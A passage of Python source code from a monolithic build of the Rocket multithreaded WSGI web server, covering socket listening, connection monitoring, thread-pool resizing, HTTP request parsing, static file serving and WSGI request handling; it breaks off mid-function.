self.thread.join()
del self.thread
self.thread = None
self.ready = True
def listen(self):
if __debug__:
self.err_log.debug('Entering main loop.')
while True:
try:
sock, addr = self.listener.accept()
if self.secure:
sock = self.wrap_socket(sock)
self.active_queue.put(((sock, addr),
self.interface[1],
self.secure))
except socket.timeout:
# socket.timeout will be raised every THREAD_STOP_CHECK_INTERVAL
# seconds. When that happens, we check if it's time to die.
if not self.ready:
if __debug__:
self.err_log.debug('Listener exiting.')
return
else:
continue
except:
self.err_log.error(traceback.format_exc())
# Monolithic build...end of module: rocket\listener.py
# Monolithic build...start of module: rocket\main.py
# Import System Modules
import sys
import time
import socket
import logging
import traceback
from threading import Lock
try:
from queue import Queue
except ImportError:
from Queue import Queue
# Import Package Modules
# package imports removed in monolithic build
# Setup Logging
log = logging.getLogger('Rocket')
log.addHandler(NullHandler())
class Rocket(object):
"""The Rocket class is responsible for handling threads and accepting and
dispatching connections."""
def __init__(self,
interfaces = ('127.0.0.1', 8000),
method = 'wsgi',
app_info = None,
min_threads = None,
max_threads = None,
queue_size = None,
timeout = 600,
handle_signals = True):
self.handle_signals = handle_signals
self.startstop_lock = Lock()
self.timeout = timeout
if not isinstance(interfaces, list):
self.interfaces = [interfaces]
else:
self.interfaces = interfaces
if min_threads is None:
min_threads = DEFAULTS['MIN_THREADS']
if max_threads is None:
max_threads = DEFAULTS['MAX_THREADS']
if not queue_size:
if hasattr(socket, 'SOMAXCONN'):
queue_size = socket.SOMAXCONN
else:
queue_size = DEFAULTS['LISTEN_QUEUE_SIZE']
if max_threads and queue_size > max_threads:
queue_size = max_threads
if isinstance(app_info, dict):
app_info['server_software'] = SERVER_SOFTWARE
self.monitor_queue = Queue()
self.active_queue = Queue()
self._threadpool = ThreadPool(get_method(method),
app_info = app_info,
active_queue = self.active_queue,
monitor_queue = self.monitor_queue,
min_threads = min_threads,
max_threads = max_threads)
# Build our socket listeners
self.listeners = [Listener(i, queue_size, self.active_queue) for i in self.interfaces]
for ndx in range(len(self.listeners)-1, 0, -1):
if not self.listeners[ndx].ready:
del self.listeners[ndx]
if not self.listeners:
log.critical("No interfaces to listen on...closing.")
sys.exit(1)
def _sigterm(self, signum, frame):
log.info('Received SIGTERM')
self.stop()
def _sighup(self, signum, frame):
log.info('Received SIGHUP')
self.restart()
def start(self, background=False):
log.info('Starting %s' % SERVER_SOFTWARE)
self.startstop_lock.acquire()
try:
# Set up our shutdown signals
if self.handle_signals:
try:
import signal
signal.signal(signal.SIGTERM, self._sigterm)
signal.signal(signal.SIGUSR1, self._sighup)
except:
log.debug('This platform does not support signals.')
# Start our worker threads
self._threadpool.start()
# Start our monitor thread
self._monitor = Monitor(self.monitor_queue,
self.active_queue,
self.timeout,
self._threadpool)
self._monitor.setDaemon(True)
self._monitor.start()
# I know that EXPR and A or B is bad but I'm keeping it for Py2.4
# compatibility.
str_extract = lambda l: (l.addr, l.port, l.secure and '*' or '')
msg = 'Listening on sockets: '
msg += ', '.join(['%s:%i%s' % str_extract(l) for l in self.listeners])
log.info(msg)
for l in self.listeners:
l.start()
finally:
self.startstop_lock.release()
if background:
return
while self._monitor.isAlive():
try:
time.sleep(THREAD_STOP_CHECK_INTERVAL)
except KeyboardInterrupt:
# Capture a keyboard interrupt when running from a console
break
except:
if self._monitor.isAlive():
log.error(traceback.format_exc())
continue
return self.stop()
def stop(self, stoplogging = False):
log.info('Stopping %s' % SERVER_SOFTWARE)
self.startstop_lock.acquire()
try:
# Stop listeners
for l in self.listeners:
l.ready = False
# Encourage a context switch
time.sleep(0.01)
for l in self.listeners:
if l.isAlive():
l.join()
# Stop Monitor
self._monitor.stop()
if self._monitor.isAlive():
self._monitor.join()
# Stop Worker threads
self._threadpool.stop()
if stoplogging:
logging.shutdown()
msg = "Calling logging.shutdown() is now the responsibility of \
the application developer. Please update your \
applications to no longer call rocket.stop(True)"
try:
import warnings
raise warnings.DeprecationWarning(msg)
except ImportError:
raise RuntimeError(msg)
finally:
self.startstop_lock.release()
def restart(self):
self.stop()
self.start()
def CherryPyWSGIServer(bind_addr,
wsgi_app,
numthreads = 10,
server_name = None,
max = -1,
request_queue_size = 5,
timeout = 10,
shutdown_timeout = 5):
""" A Cherrypy wsgiserver-compatible wrapper. """
max_threads = max
if max_threads < 0:
max_threads = 0
return Rocket(bind_addr, 'wsgi', {'wsgi_app': wsgi_app},
min_threads = numthreads,
max_threads = max_threads,
queue_size = request_queue_size,
timeout = timeout)
# Monolithic build...end of module: rocket\main.py
# Monolithic build...start of module: rocket\monitor.py
# Import System Modules
import time
import logging
import select
from threading import Thread
# Import Package Modules
# package imports removed in monolithic build
class Monitor(Thread):
# Monitor worker class.
def __init__(self,
monitor_queue,
active_queue,
timeout,
threadpool,
*args,
**kwargs):
Thread.__init__(self, *args, **kwargs)
self._threadpool = threadpool
# Instance Variables
self.monitor_queue = monitor_queue
self.active_queue = active_queue
self.timeout = timeout
self.log = logging.getLogger('Rocket.Monitor')
self.log.addHandler(NullHandler())
self.connections = set()
self.active = False
def run(self):
self.active = True
conn_list = list()
list_changed = False
# We need to make sure the queue is empty before we start
while not self.monitor_queue.empty():
self.monitor_queue.get()
if __debug__:
self.log.debug('Entering monitor loop.')
# Enter thread main loop
while self.active:
# Move the queued connections to the selection pool
while not self.monitor_queue.empty():
if __debug__:
self.log.debug('In "receive timed-out connections" loop.')
c = self.monitor_queue.get()
if c is None:
# A non-client is a signal to die
if __debug__:
self.log.debug('Received a death threat.')
self.stop()
break
self.log.debug('Received a timed out connection.')
if __debug__:
assert(c not in self.connections)
if IS_JYTHON:
# Jython requires a socket to be in Non-blocking mode in
# order to select on it.
c.setblocking(False)
if __debug__:
self.log.debug('Adding connection to monitor list.')
self.connections.add(c)
list_changed = True
# Wait on those connections
if list_changed:
conn_list = list(self.connections)
list_changed = False
try:
if len(conn_list):
readable = select.select(conn_list,
[],
[],
THREAD_STOP_CHECK_INTERVAL)[0]
else:
time.sleep(THREAD_STOP_CHECK_INTERVAL)
readable = []
if not self.active:
break
# If we have any readable connections, put them back
for r in readable:
if __debug__:
self.log.debug('Restoring readable connection')
if IS_JYTHON:
# Jython requires a socket to be in Non-blocking mode in
# order to select on it, but the rest of the code requires
# that it be in blocking mode.
r.setblocking(True)
r.start_time = time.time()
self.active_queue.put(r)
self.connections.remove(r)
list_changed = True
except:
if self.active:
raise
else:
break
# If we have any stale connections, kill them off.
if self.timeout:
now = time.time()
stale = set()
for c in self.connections:
if (now - c.start_time) >= self.timeout:
stale.add(c)
for c in stale:
if __debug__:
# "EXPR and A or B" kept for Py2.4 compatibility
data = (c.client_addr, c.server_port, c.ssl and '*' or '')
self.log.debug('Flushing stale connection: %s:%i%s' % data)
self.connections.remove(c)
list_changed = True
try:
c.close()
finally:
del c
# Dynamically resize the threadpool to adapt to our changing needs.
self._threadpool.dynamic_resize()
def stop(self):
self.active = False
if __debug__:
self.log.debug('Flushing waiting connections')
while self.connections:
c = self.connections.pop()
try:
c.close()
finally:
del c
if __debug__:
self.log.debug('Flushing queued connections')
while not self.monitor_queue.empty():
c = self.monitor_queue.get()
if c is None:
continue
try:
c.close()
finally:
del c
# Place a None sentry value to cause the monitor to die.
self.monitor_queue.put(None)
# Monolithic build...end of module: rocket\monitor.py
# Monolithic build...start of module: rocket\threadpool.py
# Import System Modules
import logging
# Import Package Modules
# package imports removed in monolithic build
# Setup Logging
log = logging.getLogger('Rocket.Errors.ThreadPool')
log.addHandler(NullHandler())
class ThreadPool:
"""The ThreadPool class is a container class for all the worker threads. It
manages the number of actively running threads."""
def __init__(self,
method,
app_info,
active_queue,
monitor_queue,
min_threads=DEFAULTS['MIN_THREADS'],
max_threads=DEFAULTS['MAX_THREADS'],
):
if __debug__:
log.debug("Initializing ThreadPool.")
self.check_for_dead_threads = 0
self.active_queue = active_queue
self.worker_class = method
self.min_threads = min_threads
self.max_threads = max_threads
self.monitor_queue = monitor_queue
self.stop_server = False
self.alive = False
# TODO - Optimize this based on some real-world usage data
self.grow_threshold = int(max_threads/10) + 2
if not isinstance(app_info, dict):
app_info = dict()
if has_futures and app_info.get('futures'):
app_info['executor'] = WSGIExecutor(max([DEFAULTS['MIN_THREADS'],
2]))
app_info.update(max_threads=max_threads,
min_threads=min_threads)
self.min_threads = min_threads
self.app_info = app_info
self.threads = set()
def start(self):
self.stop_server = False
if __debug__:
log.debug("Starting threads.")
self.grow(self.min_threads)
self.alive = True
def stop(self):
self.alive = False
if __debug__:
log.debug("Stopping threads.")
self.stop_server = True
# Prompt the threads to die
self.shrink(len(self.threads))
# Stop futures initially
if has_futures and self.app_info.get('futures'):
if __debug__:
log.debug("Future executor is present. Python will not "
"exit until all jobs have finished.")
self.app_info['executor'].shutdown(wait=False)
# Give them the gun
#active_threads = [t for t in self.threads if t.isAlive()]
#while active_threads:
# t = active_threads.pop()
# t.kill()
# Wait until they pull the trigger
for t in self.threads:
if t.isAlive():
t.join()
# Clean up the mess
self.bring_out_your_dead()
def bring_out_your_dead(self):
# Remove dead threads from the pool
dead_threads = [t for t in self.threads if not t.isAlive()]
for t in dead_threads:
if __debug__:
log.debug("Removing dead thread: %s." % t.getName())
try:
# Py2.4 complains here so we put it in a try block
self.threads.remove(t)
except:
pass
self.check_for_dead_threads -= len(dead_threads)
def grow(self, amount=None):
if self.stop_server:
return
if not amount:
amount = self.max_threads
if self.alive:
amount = min([amount, self.max_threads - len(self.threads)])
if __debug__:
log.debug("Growing by %i." % amount)
for x in range(amount):
worker = self.worker_class(self.app_info,
self.active_queue,
self.monitor_queue)
worker.setDaemon(True)
self.threads.add(worker)
worker.start()
def shrink(self, amount=1):
if __debug__:
log.debug("Shrinking by %i." % amount)
self.check_for_dead_threads += amount
for x in range(amount):
self.active_queue.put(None)
def dynamic_resize(self):
if (self.max_threads > self.min_threads or self.max_threads == 0):
if self.check_for_dead_threads > 0:
self.bring_out_your_dead()
queueSize = self.active_queue.qsize()
threadCount = len(self.threads)
if __debug__:
log.debug("Examining ThreadPool. %i threads and %i Q'd conxions"
% (threadCount, queueSize))
if queueSize == 0 and threadCount > self.min_threads:
self.shrink()
elif queueSize > self.grow_threshold:
self.grow(queueSize)
# Monolithic build...end of module: rocket\threadpool.py
# Monolithic build...start of module: rocket\worker.py
# Import System Modules
import re
import sys
import socket
import logging
import traceback
from wsgiref.headers import Headers
from threading import Thread
from datetime import datetime
try:
from urllib import unquote
except ImportError:
from urllib.parse import unquote
try:
from io import StringIO
except ImportError:
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
try:
from ssl import SSLError
except ImportError:
class SSLError(socket.error):
pass
# Import Package Modules
# package imports removed in monolithic build
# Define Constants
re_SLASH = re.compile('%2F', re.IGNORECASE)
re_REQUEST_LINE = re.compile(r"""^
(?P<method>OPTIONS|GET|HEAD|POST|PUT|DELETE|TRACE|CONNECT) # Request Method
\ # (single space)
(
(?P<scheme>[^:/]+) # Scheme
(://) #
(?P<host>[^/]+) # Host
)? #
(?P<path>(\*|/[^ \?]*)) # Path
(\? (?P<query_string>[^ ]+))? # Query String
\ # (single space)
(?P<protocol>HTTPS?/1\.[01]) # Protocol
$
""", re.X)
LOG_LINE = '%(client_ip)s - "%(request_line)s" - %(status)s %(size)s'
RESPONSE = '''\
HTTP/1.1 %s
Content-Length: %i
Content-Type: %s
%s
'''
if IS_JYTHON:
HTTP_METHODS = set(['OPTIONS', 'GET', 'HEAD', 'POST', 'PUT', 'DELETE', 'TRACE', 'CONNECT'])
class Worker(Thread):
"""The Worker class is a base class responsible for receiving connections
and (a subclass) will run an application to process the the connection """
def __init__(self,
app_info,
active_queue,
monitor_queue,
*args,
**kwargs):
Thread.__init__(self, *args, **kwargs)
# Instance Variables
self.app_info = app_info
self.active_queue = active_queue
self.monitor_queue = monitor_queue
self.size = 0
self.status = "200 OK"
self.closeConnection = True
self.request_line = ""
# Request Log
self.req_log = logging.getLogger('Rocket.Requests')
self.req_log.addHandler(NullHandler())
# Error Log
self.err_log = logging.getLogger('Rocket.Errors.'+self.getName())
self.err_log.addHandler(NullHandler())
def _handleError(self, typ, val, tb):
if typ == SSLError:
if 'timed out' in val.args[0]:
typ = SocketTimeout
if typ == SocketTimeout:
if __debug__:
self.err_log.debug('Socket timed out')
self.monitor_queue.put(self.conn)
return True
if typ == SocketClosed:
self.closeConnection = True
if __debug__:
self.err_log.debug('Client closed socket')
return False
if typ == BadRequest:
self.closeConnection = True
if __debug__:
self.err_log.debug('Client sent a bad request')
return True
if typ == socket.error:
self.closeConnection = True
if val.args[0] in IGNORE_ERRORS_ON_CLOSE:
if __debug__:
self.err_log.debug('Ignorable socket Error received...'
'closing connection.')
return False
else:
self.status = "999 Utter Server Failure"
tb_fmt = traceback.format_exception(typ, val, tb)
self.err_log.error('Unhandled Error when serving '
'connection:\n' + '\n'.join(tb_fmt))
return False
self.closeConnection = True
tb_fmt = traceback.format_exception(typ, val, tb)
self.err_log.error('\n'.join(tb_fmt))
self.send_response('500 Server Error')
return False
def run(self):
if __debug__:
self.err_log.debug('Entering main loop.')
# Enter thread main loop
while True:
conn = self.active_queue.get()
if not conn:
# A non-client is a signal to die
if __debug__:
self.err_log.debug('Received a death threat.')
return conn
if isinstance(conn, tuple):
conn = Connection(*conn)
self.conn = conn
if conn.ssl != conn.secure:
self.err_log.info('Received HTTP connection on HTTPS port.')
self.send_response('400 Bad Request')
self.closeConnection = True
conn.close()
continue
else:
if __debug__:
self.err_log.debug('Received a connection.')
self.closeConnection = False
# Enter connection serve loop
while True:
if __debug__:
self.err_log.debug('Serving a request')
try:
self.run_app(conn)
log_info = dict(client_ip = conn.client_addr,
time = datetime.now().strftime('%c'),
status = self.status.split(' ')[0],
size = self.size,
request_line = self.request_line)
self.req_log.info(LOG_LINE % log_info)
except:
exc = sys.exc_info()
handled = self._handleError(*exc)
if handled:
break
else:
if self.request_line:
log_info = dict(client_ip = conn.client_addr,
time = datetime.now().strftime('%c'),
status = self.status.split(' ')[0],
size = self.size,
request_line = self.request_line + ' - not stopping')
self.req_log.info(LOG_LINE % log_info)
if self.closeConnection:
try:
conn.close()
except:
self.err_log.error(str(traceback.format_exc()))
break
def run_app(self, conn):
# Must be overridden with a method reads the request from the socket
# and sends a response.
self.closeConnection = True
raise NotImplementedError('Overload this method!')
def send_response(self, status):
stat_msg = status.split(' ', 1)[1]
msg = RESPONSE % (status,
len(stat_msg),
'text/plain',
stat_msg)
try:
self.conn.sendall(b(msg))
except socket.error:
self.closeConnection = True
self.err_log.error('Tried to send "%s" to client but received socket'
' error' % status)
#def kill(self):
# if self.isAlive() and hasattr(self, 'conn'):
# try:
# self.conn.shutdown(socket.SHUT_RDWR)
# except socket.error:
# info = sys.exc_info()
# if info[1].args[0] != socket.EBADF:
# self.err_log.debug('Error on shutdown: '+str(info))
def read_request_line(self, sock_file):
self.request_line = ''
try:
# Grab the request line
d = sock_file.readline()
if PY3K:
d = d.decode('ISO-8859-1')
if d == '\r\n':
# Allow an extra NEWLINE at the beginning per HTTP 1.1 spec
if __debug__:
self.err_log.debug('Client sent newline')
d = sock_file.readline()
if PY3K:
d = d.decode('ISO-8859-1')
except socket.timeout:
raise SocketTimeout("Socket timed out before request.")
d = d.strip()
if not d:
if __debug__:
self.err_log.debug('Client did not send a recognizable request.')
raise SocketClosed('Client closed socket.')
self.request_line = d
# NOTE: I've replaced the traditional method of procedurally breaking
# apart the request line with a (rather unsightly) regular expression.
# However, Java's regexp support sucks so bad that it actually takes
# longer in Jython to process the regexp than procedurally. So I've
# left the old code here for Jython's sake...for now.
if IS_JYTHON:
return self._read_request_line_jython(d)
match = re_REQUEST_LINE.match(d)
if not match:
self.send_response('400 Bad Request')
raise BadRequest
req = match.groupdict()
for k,v in req.items():
if not v:
req[k] = ""
if k == 'path':
req['path'] = r'%2F'.join([unquote(x) for x in re_SLASH.split(v)])
return req
def _read_request_line_jython(self, d):
d = d.strip()
try:
method, uri, proto = d.split(' ')
if not proto.startswith('HTTP') or \
proto[-3:] not in ('1.0', '1.1') or \
method not in HTTP_METHODS:
self.send_response('400 Bad Request')
raise BadRequest
except ValueError:
self.send_response('400 Bad Request')
raise BadRequest
req = dict(method=method, protocol = proto)
scheme = ''
host = ''
if uri == '*' or uri.startswith('/'):
path = uri
elif '://' in uri:
scheme, rest = uri.split('://')
host, path = rest.split('/', 1)
path = '/' + path
else:
self.send_response('400 Bad Request')
raise BadRequest
query_string = ''
if '?' in path:
path, query_string = path.split('?', 1)
path = r'%2F'.join([unquote(x) for x in re_SLASH.split(path)])
req.update(path=path,
query_string=query_string,
scheme=scheme.lower(),
host=host)
return req
def read_headers(self, sock_file):
try:
headers = dict()
l = sock_file.readline()
lname = None
lval = None
while True:
if PY3K:
try:
l = str(l, 'ISO-8859-1')
except UnicodeDecodeError:
self.err_log.warning('Client sent invalid header: ' + repr(l))
if l == '\r\n':
break
if l[0] in ' \t' and lname:
# Some headers take more than one line
lval += ',' + l.strip()
else:
# HTTP header values are latin-1 encoded
l = l.split(':', 1)
# HTTP header names are us-ascii encoded
lname = l[0].strip().upper().replace('-', '_')
lval = l[-1].strip()
headers[str(lname)] = str(lval)
l = sock_file.readline()
except socket.timeout:
raise SocketTimeout("Socket timed out before request.")
return headers
class SocketTimeout(Exception):
"Exception for when a socket times out between requests."
pass
class BadRequest(Exception):
"Exception for when a client sends an incomprehensible request."
pass
class SocketClosed(Exception):
"Exception for when a socket is closed by the client."
pass
class ChunkedReader(object):
def __init__(self, sock_file):
self.stream = sock_file
self.chunk_size = 0
def _read_header(self):
chunk_len = ""
try:
while "" == chunk_len:
chunk_len = self.stream.readline().strip()
return int(chunk_len, 16)
except ValueError:
return 0
def read(self, size):
data = b('')
chunk_size = self.chunk_size
while size:
if not chunk_size:
chunk_size = self._read_header()
if size < chunk_size:
data += self.stream.read(size)
chunk_size -= size
break
else:
if not chunk_size:
break
data += self.stream.read(chunk_size)
size -= chunk_size
chunk_size = 0
self.chunk_size = chunk_size
return data
def readline(self):
data = b('')
c = self.read(1)
while c and c != b('\n'):
data += c
c = self.read(1)
data += c
return data
def readlines(self):
yield self.readline()
def get_method(method):
methods = dict(wsgi=WSGIWorker,
fs=FileSystemWorker)
return methods[method.lower()]
# Monolithic build...end of module: rocket\worker.py
# Monolithic build...start of module: rocket\methods\__init__.py
# Monolithic build...end of module: rocket\methods\__init__.py
# Monolithic build...start of module: rocket\methods\fs.py
# Import System Modules
import os
import time
import mimetypes
from email.utils import formatdate
from wsgiref.headers import Headers
from wsgiref.util import FileWrapper
# Import Package Modules
# package imports removed in monolithic build
# Define Constants
CHUNK_SIZE = 2**16 # 64 Kilobyte chunks
HEADER_RESPONSE = '''HTTP/1.1 %s\r\n%s'''
INDEX_HEADER = '''\
<html>
<head><title>Directory Index: %(path)s</title>
<style> .parent { margin-bottom: 1em; }</style>
</head>
<body><h1>Directory Index: %(path)s</h1>
<table>
<tr><th>Directories</th></tr>
'''
INDEX_ROW = '''<tr><td><div class="%(cls)s"><a href="/%(link)s">%(name)s</a></div></td></tr>'''
INDEX_FOOTER = '''</table></body></html>\r\n'''
class LimitingFileWrapper(FileWrapper):
def __init__(self, limit=None, *args, **kwargs):
self.limit = limit
FileWrapper.__init__(self, *args, **kwargs)
def read(self, amt):
if amt > self.limit:
amt = self.limit
self.limit -= amt
return FileWrapper.read(self, amt)
class FileSystemWorker(Worker):
def __init__(self, *args, **kwargs):
"""Builds some instance variables that will last the life of the
thread."""
Worker.__init__(self, *args, **kwargs)
self.root = os.path.abspath(self.app_info['document_root'])
self.display_index = self.app_info['display_index']
def serve_file(self, filepath, headers):
filestat = os.stat(filepath)
self.size = filestat.st_size
modtime = time.strftime("%a, %d %b %Y %H:%M:%S GMT",
time.gmtime(filestat.st_mtime))
self.headers.add_header('Last-Modified', modtime)
if headers.get('if_modified_since') == modtime:
# The browser cache is up-to-date, send a 304.
self.status = "304 Not Modified"
self.data = []
return
ct = mimetypes.guess_type(filepath)[0]
self.content_type = ct if ct else 'text/plain'
try:
f = open(filepath, 'rb')
self.headers['Pragma'] = 'cache'
self.headers['Cache-Control'] = 'private'
self.headers['Content-Length'] = str(self.size)
if self.etag:
self.headers.add_header('Etag', self.etag)
if self.expires:
self.headers.add_header('Expires', self.expires)
try:
# Implement 206 partial file support.
start, end = headers['range'].split('-')
start = 0 if not start.isdigit() else int(start)
end = self.size if not end.isdigit() else int(end)
if self.size < end or start < 0:
self.status = "214 Unsatisfiable Range Requested"
self.data = FileWrapper(f, CHUNK_SIZE)
else:
f.seek(start)
self.data = LimitingFileWrapper(f, CHUNK_SIZE, limit=end)
self.status = "206 Partial Content"
except:
self.data = FileWrapper(f, CHUNK_SIZE)
except IOError:
self.status = "403 Forbidden"
def serve_dir(self, pth, rpth):
def rel_path(path):
return os.path.normpath(path[len(self.root):] if path.startswith(self.root) else path)
if not self.display_index:
self.status = '404 File Not Found'
return b('')
else:
self.content_type = 'text/html'
dir_contents = [os.path.join(pth, x) for x in os.listdir(os.path.normpath(pth))]
dir_contents.sort()
dirs = [rel_path(x)+'/' for x in dir_contents if os.path.isdir(x)]
files = [rel_path(x) for x in dir_contents if os.path.isfile(x)]
self.data = [INDEX_HEADER % dict(path='/'+rpth)]
if rpth:
self.data += [INDEX_ROW % dict(name='(parent directory)', cls='dir parent', link='/'.join(rpth[:-1].split('/')[:-1]))]
self.data += [INDEX_ROW % dict(name=os.path.basename(x[:-1]), link=os.path.join(rpth, os.path.basename(x[:-1])).replace('\\', '/'), cls='dir') for x in dirs]
self.data += ['<tr><th>Files</th></tr>']
self.data += [INDEX_ROW % dict(name=os.path.basename(x), link=os.path.join(rpth, os.path.basename(x)).replace('\\', '/'), cls='file') for x in files]
self.data += [INDEX_FOOTER]
self.headers['Content-Length'] = self.size = str(sum([len(x) for x in self.data]))
self.status = '200 OK'
def run_app(self, conn):
self.status = "200 OK"
self.size = 0
self.expires = None
self.etag = None
self.content_type = 'text/plain'
self.content_length = None
if __debug__:
self.err_log.debug('Getting sock_file')
# Build our file-like object
sock_file = conn.makefile('rb',BUF_SIZE)
request = self.read_request_line(sock_file)
if request['method'].upper() not in ('GET', ):
self.status = "501 Not Implemented"
try:
# Get our file path
headers = dict([(str(k.lower()), v) for k, v in self.read_headers(sock_file).items()])
rpath = request.get('path', '').lstrip('/')
filepath = os.path.join(self.root, rpath)
filepath = os.path.abspath(filepath)
if __debug__:
self.err_log.debug('Request for path: %s' % filepath)
self.closeConnection = headers.get('connection', 'close').lower() == 'close'
self.headers = Headers([('Date', formatdate(usegmt=True)),
('Server', HTTP_SERVER_SOFTWARE),
('Connection', headers.get('connection', 'close')),
])
if not filepath.lower().startswith(self.root.lower()):
# File must be within our root directory
self.status = "400 Bad Request"
self.closeConnection = True
elif not os.path.exists(filepath):
self.status = "404 File Not Found"
self.closeConnection = True
elif os.path.isdir(filepath):
self.serve_dir(filepath, rpath)
elif os.path.isfile(filepath):
self.serve_file(filepath, headers)
else:
# It exists but it's not a file or a directory????
# What is it then?
self.status = "501 Not Implemented"
self.closeConnection = True
h = self.headers
statcode, statstr = self.status.split(' ', 1)
statcode = int(statcode)
if statcode >= 400:
h.add_header('Content-Type', self.content_type)
self.data = [statstr]
# Build our output headers
header_data = HEADER_RESPONSE % (self.status, str(h))
# Send the headers
if __debug__:
self.err_log.debug('Sending Headers: %s' % repr(header_data))
self.conn.sendall(b(header_data))
for data in self.data:
self.conn.sendall(b(data))
if hasattr(self.data, 'close'):
self.data.close()
finally:
if __debug__:
self.err_log.debug('Finally closing sock_file')
sock_file.close()
# Monolithic build...end of module: rocket\methods\fs.py
# Monolithic build...start of module: rocket\methods\wsgi.py
# Import System Modules
import sys
import socket
from wsgiref.headers import Headers
from wsgiref.util import FileWrapper
# Import Package Modules
# package imports removed in monolithic build
if PY3K:
from email.utils import formatdate
else:
# Caps Utils for Py2.4 compatibility
from email.Utils import formatdate
# Define Constants
NEWLINE = b('\r\n')
HEADER_RESPONSE = '''HTTP/1.1 %s\r\n%s'''
BASE_ENV = {'SERVER_NAME': SERVER_NAME,
'SCRIPT_NAME': '', # Direct call WSGI does not need a name
'wsgi.errors': sys.stderr,
'wsgi.version': (1, 0),
'wsgi.multiprocess': False,
'wsgi.run_once': False,
'wsgi.file_wrapper': FileWrapper
}
class WSGIWorker(Worker):
def __init__(self, *args, **kwargs):
"""Builds some instance variables that will last the life of the
thread."""
Worker.__init__(self, *args, **kwargs)
if isinstance(self.app_info, dict):
multithreaded = self.app_info.get('max_threads') != 1
else:
multithreaded = False
self.base_environ = dict({'SERVER_SOFTWARE': self.app_info['server_software'],
'wsgi.multithread': multithreaded,
})
self.base_environ.update(BASE_ENV)
# Grab our application
self.app = self.app_info.get('wsgi_app')
if not hasattr(self.app, "__call__"):
raise TypeError("The wsgi_app specified (%s) is not a valid WSGI application." % repr(self.app))
# Enable futures
if has_futures and self.app_info.get('futures'):
executor = self.app_info['executor']
self.base_environ.update({"wsgiorg.executor": executor,
"wsgiorg.futures": executor.futures})
def build_environ(self, sock_file, conn):
""" Build the execution environment. """
# Grab the request line
request = self.read_request_line(sock_file)
# Copy the Base Environment
environ = self.base_environ.copy()
# Grab the headers
for k, v in self.read_headers(sock_file).items():
environ[str('HTTP_'+k)] = v
# Add CGI Variables
environ['REQUEST_METHOD'] = request['method']
environ['PATH_INFO'] = request['path']
environ['SERVER_PROTOCOL'] = request['protocol']
environ['SERVER_PORT'] = str(conn.server_port)
environ['REMOTE_PORT'] = str(conn.client_port)
environ['REMOTE_ADDR'] = str(conn.client_addr)
environ['QUERY_STRING'] = request['query_string']
if 'HTTP_CONTENT_LENGTH' in environ:
environ['CONTENT_LENGTH'] = environ['HTTP_CONTENT_LENGTH']
if 'HTTP_CONTENT_TYPE' in environ:
environ['CONTENT_TYPE'] = environ['HTTP_CONTENT_TYPE']
# Save the request method for later
self.request_method = environ['REQUEST_METHOD']
# Add Dynamic WSGI Variables
if conn.ssl:
environ['wsgi.url_scheme'] = 'https'
environ['HTTPS'] = 'on'
else:
environ['wsgi.url_scheme'] = 'http'
if conn.ssl:
try:
peercert = conn.socket.getpeercert(binary_form=True)
environ['SSL_CLIENT_RAW_CERT'] = \
peercert and ssl.DER_cert_to_PEM_cert(peercert)
except Exception,e:
print e
if environ.get('HTTP_TRANSFER_ENCODING', '') == 'chunked':
environ['wsgi.input'] = ChunkedReader(sock_file)
else:
environ['wsgi.input'] = sock_file
return environ
def send_headers(self, data, sections):
h_set = self.header_set
# Does the app want us to send output chunked?
self.chunked = h_set.get('transfer-encoding', '').lower() == 'chunked'
# Add a Date header if it's not there already
if not 'date' in h_set:
h_set['Date'] = formatdate(usegmt=True)
# Add a Server header if it's not there already
if not 'server' in h_set:
h_set['Server'] = HTTP_SERVER_SOFTWARE
if 'content-length' in h_set:
self.size = int(h_set['content-length'])
else:
s = int(self.status.split(' ')[0])
if s < 200 or s not in (204, 205, 304):
if not self.chunked:
if sections == 1:
# Add a Content-Length header if it's not there already
h_set['Content-Length'] = str(len(data))
self.size = len(data)
else:
# If they sent us more than one section, we blow chunks
h_set['Transfer-Encoding'] = 'Chunked'
self.chunked = True
if __debug__:
self.err_log.debug('Adding header...'
'Transfer-Encoding: Chunked')
if 'connection' not in h_set:
# If the application did not provide a connection header, fill it in
client_conn = self.environ.get('HTTP_CONNECTION', '').lower()
if self.environ['SERVER_PROTOCOL'] == 'HTTP/1.1':
# HTTP = 1.1 defaults to keep-alive connections
if client_conn:
h_set['Connection'] = client_conn
else:
h_set['Connection'] = 'keep-alive'
else:
# HTTP < 1.1 supports keep-alive but it's quirky so we don't support it
h_set['Connection'] = 'close'
# Close our connection if we need to.
self.closeConnection = h_set.get('connection', '').lower() == 'close'
# Build our output headers
header_data = HEADER_RESPONSE % (self.status, str(h_set))
# Send the headers
if __debug__:
self.err_log.debug('Sending Headers: %s' % repr(header_data))
self.conn.sendall(b(header_data))
self.headers_sent = True
def write_warning(self, data, sections=None):
self.err_log.warning('WSGI app called write method directly. This is '
'deprecated behavior. Please update your app.')
return self.write(data, sections)
def write(self, data, sections=None):
""" Write the data to the output socket. """
if self.error[0]:
self.status = self.error[0]
data = b(self.error[1])
if not self.headers_sent:
self.send_headers(data, sections)
if self.request_method != 'HEAD':
try:
if self.chunked:
self.conn.sendall(b('%x\r\n%s\r\n' % (len(data), data)))
else:
self.conn.sendall(data)
except socket.error:
# But some clients will close the connection before that
# resulting in a socket error.
self.closeConnection = True
def start_response(self, status, response_headers, exc_info=None):
""" Store the HTTP status and headers to be sent when self.write is
called. """
if exc_info:
try:
if self.headers_sent:
# Re-raise original exception if headers sent
# because this violates WSGI specification.
raise
finally:
exc_info = None
elif self.header_set:
raise AssertionError("Headers already set!")
if PY3K and not isinstance(status, str):
self.status = str(status, 'ISO-8859-1')
else:
self.status = status
# Make sure headers are bytes objects
try:
self.header_set = Headers(response_headers)
except UnicodeDecodeError:
self.error = ('500 Internal Server Error',
'HTTP Headers should be bytes')
self.err_log.error('Received HTTP Headers from client that contain'
' invalid characters for Latin-1 encoding.')
return self.write_warning
def run_app(self, conn):
self.size = 0
self.header_set = Headers([])
self.headers_sent = False
self.error = (None, None)
self.chunked = False
sections = None
output = None
if __debug__:
self.err_log.debug('Getting sock_file')
# Build our file-like object
if PY3K:
sock_file = conn.makefile(mode='rb', buffering=BUF_SIZE)
else:
sock_file = conn.makefile(BUF_SIZE)
try:
# Read the headers and build our WSGI environment
self.environ = environ = self.build_environ(sock_file, conn)
# Handle 100 Continue
if environ.get('HTTP_EXPECT', '') == '100-continue':
res = environ['SERVER_PROTOCOL'] + ' 100 Continue\r\n\r\n'
conn.sendall(b(res))
# Send it to our WSGI application
output = self.app(environ, self.start_response)
if not hasattr(output, '__len__') and not hasattr(output, '__iter__'):
